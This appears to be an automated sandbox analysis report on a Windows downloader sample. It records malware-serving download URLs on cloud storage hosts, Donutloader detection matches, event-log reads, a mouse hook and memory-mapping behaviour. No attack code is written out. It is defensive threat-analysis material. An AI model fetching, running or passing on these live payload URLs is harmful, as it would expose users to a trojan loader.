Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_00007FF89FDBE20C FindFirstFileExW,	8_2_00007FF89FDBE20C
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00007FF8BFB7E20C FindFirstFileExW,	16_2_00007FF8BFB7E20C

Source: C:\Windows\System32\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\
Source: C:\Windows\System32\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\
Source: C:\Windows\System32\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_#U6c47#U8054#U65_216329f15446f2b8c3a5289c0fe9c4b73214d_6b7b5bfd_7fa7792f-7ddb-47c5-8ccd-4ba2ab9f3a72\
Source: C:\Windows\System32\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_GamePlusPlus.exe_c9764143e078c6f7f2798a7b2834e710aeda4b32_54de7261_ea7bb66d-8dc3-4b8e-b9a7-d202b9eabf7e\
Source: C:\Windows\System32\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\
Source: C:\Windows\System32\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue

Source: global traffic	HTTP traffic detected: GET /GamePlusPlus.exe HTTP/1.1Host: wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mpclient.dat HTTP/1.1Host: www19daxcsdaf-1328031368.cos.ap-guangzhou.myqcloud.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /openvr_api.dll HTTP/1.1Host: wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com
Source: global traffic	HTTP traffic detected: GET /mpclient64.dat HTTP/1.1Host: wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com
Source: global traffic	HTTP traffic detected: GET /steam_api64.dll HTTP/1.1Host: wwwwgetmore-1328031368.cos.ap-chongqing.myqcloud.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /APP.exe HTTP/1.1Host: wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49707 -> 183.66.100.51:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49709 -> 183.66.100.51:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49745 -> 183.66.100.51:443

Source: unknown	HTTPS traffic detected: 183.66.100.51:443 -> 192.168.2.5:49705 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 159.75.57.35:443 -> 192.168.2.5:49706 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 183.66.100.45:443 -> 192.168.2.5:49727 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 149.115.250.19
Source: unknown	TCP traffic detected without corresponding DNS query: 149.115.250.19
Source: unknown	TCP traffic detected without corresponding DNS query: 149.115.250.19
Source: unknown	TCP traffic detected without corresponding DNS query: 149.115.250.19
Source: unknown	TCP traffic detected without corresponding DNS query: 149.115.250.19
Source: unknown	TCP traffic detected without corresponding DNS query: 149.115.250.19
Source: unknown	TCP traffic detected without corresponding DNS query: 149.115.250.19
Source: unknown	TCP traffic detected without corresponding DNS query: 149.115.250.19
Source: unknown	TCP traffic detected without corresponding DNS query: 149.115.250.19
Source: unknown	TCP traffic detected without corresponding DNS query: 149.115.250.19
Source: unknown	TCP traffic detected without corresponding DNS query: 149.115.250.19
Source: unknown	TCP traffic detected without corresponding DNS query: 149.115.250.19
Source: unknown	TCP traffic detected without corresponding DNS query: 149.115.250.19
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /GamePlusPlus.exe HTTP/1.1Host: wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mpclient.dat HTTP/1.1Host: www19daxcsdaf-1328031368.cos.ap-guangzhou.myqcloud.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /openvr_api.dll HTTP/1.1Host: wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com
Source: global traffic	HTTP traffic detected: GET /mpclient64.dat HTTP/1.1Host: wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com
Source: global traffic	HTTP traffic detected: GET /steam_api64.dll HTTP/1.1Host: wwwwgetmore-1328031368.cos.ap-chongqing.myqcloud.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /APP.exe HTTP/1.1Host: wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com

Source: global traffic	DNS traffic detected: DNS query: wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com
Source: global traffic	DNS traffic detected: DNS query: www19daxcsdaf-1328031368.cos.ap-guangzhou.myqcloud.com
Source: global traffic	DNS traffic detected: DNS query: wwwwgetmore-1328031368.cos.ap-chongqing.myqcloud.com

Source: steam_api64.dll.0.dr, GamePlusPlus.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.0000000005485000.00000004.00000800.00020000.00000000.sdmp, #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.0000000005425000.00000004.00000800.00020000.00000000.sdmp, steam_api64.dll.0.dr, GamePlusPlus.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.0000000005485000.00000004.00000800.00020000.00000000.sdmp, #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.0000000005425000.00000004.00000800.00020000.00000000.sdmp, steam_api64.dll.0.dr, GamePlusPlus.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.0000000005485000.00000004.00000800.00020000.00000000.sdmp, #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.0000000005425000.00000004.00000800.00020000.00000000.sdmp, steam_api64.dll.0.dr, GamePlusPlus.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: APP.exe, 00000003.00000002.2432695215.000000001D100000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micros
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.4040565455.000000001DEF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m~
Source: steam_api64.dll.0.dr, GamePlusPlus.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.0000000005485000.00000004.00000800.00020000.00000000.sdmp, #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.0000000005425000.00000004.00000800.00020000.00000000.sdmp, steam_api64.dll.0.dr, GamePlusPlus.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.0000000005485000.00000004.00000800.00020000.00000000.sdmp, #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.0000000005425000.00000004.00000800.00020000.00000000.sdmp, steam_api64.dll.0.dr, GamePlusPlus.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: GamePlusPlus.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.0000000005485000.00000004.00000800.00020000.00000000.sdmp, #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.0000000005425000.00000004.00000800.00020000.00000000.sdmp, steam_api64.dll.0.dr, GamePlusPlus.exe.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3992968256.0000000015466000.00000004.00000800.00020000.00000000.sdmp, APP.exe, 00000003.00000002.2424632133.0000000013D8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.0000000005485000.00000004.00000800.00020000.00000000.sdmp, #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.0000000005425000.00000004.00000800.00020000.00000000.sdmp, steam_api64.dll.0.dr, GamePlusPlus.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.0000000005485000.00000004.00000800.00020000.00000000.sdmp, #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.0000000005425000.00000004.00000800.00020000.00000000.sdmp, steam_api64.dll.0.dr, GamePlusPlus.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: steam_api64.dll.0.dr, GamePlusPlus.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.0000000005485000.00000004.00000800.00020000.00000000.sdmp, #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.0000000005425000.00000004.00000800.00020000.00000000.sdmp, steam_api64.dll.0.dr, GamePlusPlus.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: APP.exe, 00000003.00000002.2398792694.0000000003F43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.00000000056D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.pngxktI
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.00000000056D4000.00000004.00000800.00020000.00000000.sdmp, APP.exe, 00000003.00000002.2398792694.0000000003F43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.00000000053D1000.00000004.00000800.00020000.00000000.sdmp, APP.exe, 00000003.00000002.2398792694.0000000003D11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.00000000056D4000.00000004.00000800.00020000.00000000.sdmp, APP.exe, 00000003.00000002.2398792694.0000000003F43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: Amcache.hve.7.dr	String found in binary or memory: http://upx.sf.net
Source: APP.exe, 00000003.00000002.2398792694.0000000003F43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.00000000056D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlxktI
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.0000000005485000.00000004.00000800.00020000.00000000.sdmp, #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.0000000005425000.00000004.00000800.00020000.00000000.sdmp, steam_api64.dll.0.dr, GamePlusPlus.exe.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.4043145329.000000001E180000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.00000000056D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.00000000056D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelpxktI
Source: APP.exe, 00000003.00000002.2424632133.0000000013D8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: APP.exe, 00000003.00000002.2424632133.0000000013D8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: APP.exe, 00000003.00000002.2424632133.0000000013D8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: APP.exe, 00000003.00000002.2398792694.0000000003F43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.00000000056D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/PesterxktI
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3992968256.0000000015466000.00000004.00000800.00020000.00000000.sdmp, APP.exe, 00000003.00000002.2424632133.0000000013D8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.0000000005429000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www19daxcsdaf-1328031368.cos.ap-guangzhou.myqcloud.com
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.0000000005429000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www19daxcsdaf-1328031368.cos.ap-guangzhou.myqcloud.com/mpclient.dat
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.00000000053D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.00000000053D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com/GamePlusPlus.exe
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.0000000005491000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://wwwwgetmore-1328031368.cos.ap-chongqing.myqcloud.com
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.0000000005491000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://wwwwgetmore-1328031368.cos.ap-chongqing.myqcloud.com/steam_api64.dll

Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: GamePlusPlus.exe, 00000008.00000002.2915486222.000001B59B0F1000.00000002.10000000.00040000.00000000.sdmp

Binary or memory string: DirectInput8Create

memstr_41171fbf-e

Source: C:\Program Files\Weekplus\GamePlusPlus.exe

Windows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dll

Source: C:\Program Files\Weekplus\GamePlusPlus.exe

8_2_00007FF78B874790

Spam, unwanted Advertisements and Ransom Demands

Reads the Security eventlog

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShell	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShell	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShell	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShell	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShell	Jump to behavior

Reads the System eventlog

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell	Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: sslproxydump.pcap, type: PCAP	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000008.00000002.2915314802.000001B59AFF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000008.00000002.2915076303.000001B5996E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000016.00000002.3916863440.000002C150E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000016.00000002.3916671618.000002C14F4A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000010.00000002.3326654982.00000115DA868000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.3969038874.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000010.00000002.3326948864.00000115DC150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.4040565455.000000001DF16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: C:\Program Files\Weekplus\mpclient64.dat, type: DROPPED	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: C:\Program Files\Weekplus\mpclient.dat, type: DROPPED	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown

Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_000001B59B03D5A8 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtUnmapViewOfSection,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,	8_2_000001B59B03D5A8
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00000115DC19D5A8 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtUnmapViewOfSection,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,	16_2_00000115DC19D5A8
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 22_2_000002C150E5D5A8 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtUnmapViewOfSection,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,	22_2_000002C150E5D5A8

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: 0_2_00007FF8B915A430	0_2_00007FF8B915A430
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: 0_2_00007FF8B915A930	0_2_00007FF8B915A930
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: 0_2_00007FF8B915B990	0_2_00007FF8B915B990
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: 0_2_00007FF8B9142CA0	0_2_00007FF8B9142CA0
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: 0_2_00007FF8B9174CB0	0_2_00007FF8B9174CB0
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: 0_2_00007FF8B9158B20	0_2_00007FF8B9158B20
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: 0_2_00007FF8B9157F6E	0_2_00007FF8B9157F6E
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: 0_2_00007FF8B915C130	0_2_00007FF8B915C130
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: 0_2_00007FF8B915B191	0_2_00007FF8B915B191
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: 0_2_00007FF8B91584D0	0_2_00007FF8B91584D0
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: 0_2_02E24B78	0_2_02E24B78
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: 0_2_02E2479C	0_2_02E2479C
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: 0_2_02E28254	0_2_02E28254
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: 0_2_02E25A5C	0_2_02E25A5C
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: 0_2_02E238C0	0_2_02E238C0
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: 0_2_02E24FA8	0_2_02E24FA8
Source: C:\Program Files\Weekplus\APP.exe	Code function: 3_2_00007FF849012F27	3_2_00007FF849012F27
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_00007FF78B8758F0	8_2_00007FF78B8758F0
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_00007FF78B874790	8_2_00007FF78B874790
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_00007FF78B8885D0	8_2_00007FF78B8885D0
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_00007FF78B87A190	8_2_00007FF78B87A190
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_00007FF78B872370	8_2_00007FF78B872370
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_00007FF78B8906F0	8_2_00007FF78B8906F0
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_00007FF78B88FA68	8_2_00007FF78B88FA68
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_00007FF78B889520	8_2_00007FF78B889520
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_00007FF78B876D20	8_2_00007FF78B876D20
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_00007FF78B890950	8_2_00007FF78B890950
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_00007FF78B882950	8_2_00007FF78B882950
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_00007FF89FDB50B8	8_2_00007FF89FDB50B8
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_00007FF89FDA80B0	8_2_00007FF89FDA80B0
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_00007FF89FDBE000	8_2_00007FF89FDBE000
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_00007FF89FDAFFE8	8_2_00007FF89FDAFFE8
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_00007FF89FDBA7B4	8_2_00007FF89FDBA7B4
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_00007FF89FDC66F8	8_2_00007FF89FDC66F8
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_00007FF89FDB55B8	8_2_00007FF89FDB55B8
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_00007FF89FDA5D80	8_2_00007FF89FDA5D80
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_00007FF89FDAFD80	8_2_00007FF89FDAFD80
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_00007FF89FDB74C0	8_2_00007FF89FDB74C0
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_00007FF89FDA6C20	8_2_00007FF89FDA6C20
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_00007FF89FDC2320	8_2_00007FF89FDC2320
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_00007FF89FDC0300	8_2_00007FF89FDC0300
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_00007FF89FDAFAFC	8_2_00007FF89FDAFAFC
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_00007FF89FDC32D8	8_2_00007FF89FDC32D8
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_00007FF89FDB7A7C	8_2_00007FF89FDB7A7C
